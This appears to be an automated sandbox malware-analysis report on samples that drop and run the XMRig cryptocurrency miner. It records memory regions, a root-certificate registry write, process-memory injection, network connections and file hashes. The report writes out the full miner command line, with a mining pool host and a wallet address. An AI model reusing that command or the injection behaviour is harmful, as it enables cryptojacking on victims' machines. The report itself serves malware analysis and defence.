memory/1844-17-0x000001FDBCC00000-0x000001FDBCC20000-memory.dmp
memory/1844-18-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-19-0x000001FDBE400000-0x000001FDBE420000-memory.dmp
memory/1844-20-0x000001FDBE3E0000-0x000001FDBE400000-memory.dmp
memory/1844-21-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-22-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-25-0x000001FDBE3E0000-0x000001FDBE400000-memory.dmp
memory/1844-24-0x000001FDBE400000-0x000001FDBE420000-memory.dmp
memory/1844-23-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-26-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-27-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-28-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-29-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-30-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-31-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-32-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-33-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-34-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-35-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-36-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-37-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-38-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-39-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-40-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-41-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-42-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-43-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-44-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-45-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-46-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-47-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-48-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-49-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-50-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-51-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-52-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-53-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-54-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-55-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-56-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-57-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-58-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-59-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-60-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-61-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-62-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-63-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-64-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-65-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-66-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-67-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-68-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-69-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-70-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-71-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-72-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-73-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-74-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-75-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-76-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-77-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-78-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-79-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-80-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-81-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-82-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-83-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
memory/1844-84-0x00007FF7E1760000-0x00007FF7E2263000-memory.dmp
Analysis: behavioral13
Detonation Overview
Submitted
2024-05-22 14:45
Reported
2024-05-22 16:00
Platform
win10v2004-20240508-en
Max time kernel
1793s
Max time network
1804s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4836 wrote to memory of 2060 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 4836 wrote to memory of 2060 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| NL | 23.62.61.72:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/2060-16-0x0000029A17F10000-0x0000029A17F30000-memory.dmp
memory/2060-17-0x0000029A17F60000-0x0000029A17F80000-memory.dmp
memory/2060-18-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-21-0x0000029A17FA0000-0x0000029A17FC0000-memory.dmp
memory/2060-19-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-20-0x0000029A17F80000-0x0000029A17FA0000-memory.dmp
memory/2060-22-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-23-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-24-0x0000029A17F80000-0x0000029A17FA0000-memory.dmp
memory/2060-25-0x0000029A17FA0000-0x0000029A17FC0000-memory.dmp
memory/2060-26-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-27-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-28-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-29-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-30-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-31-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-32-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-33-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-34-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-35-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-36-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-37-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-38-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-39-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-40-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-41-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-42-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-43-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-44-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-45-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-46-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-47-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-48-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-49-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-50-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-51-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-52-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-53-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-54-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-55-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-56-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-57-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-58-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-59-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-60-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-61-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-62-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-63-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-64-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-65-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-66-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-67-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-68-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-69-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-70-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-71-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-72-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-73-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-74-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-75-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-76-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-77-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-78-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-79-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-80-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-81-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-82-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-83-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
memory/2060-84-0x00007FF7B9550000-0x00007FF7BA053000-memory.dmp
Analysis: behavioral15
Detonation Overview
Submitted
2024-05-22 14:45
Reported
2024-05-22 16:00
Platform
win10v2004-20240426-en
Max time kernel
1795s
Max time network
1799s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346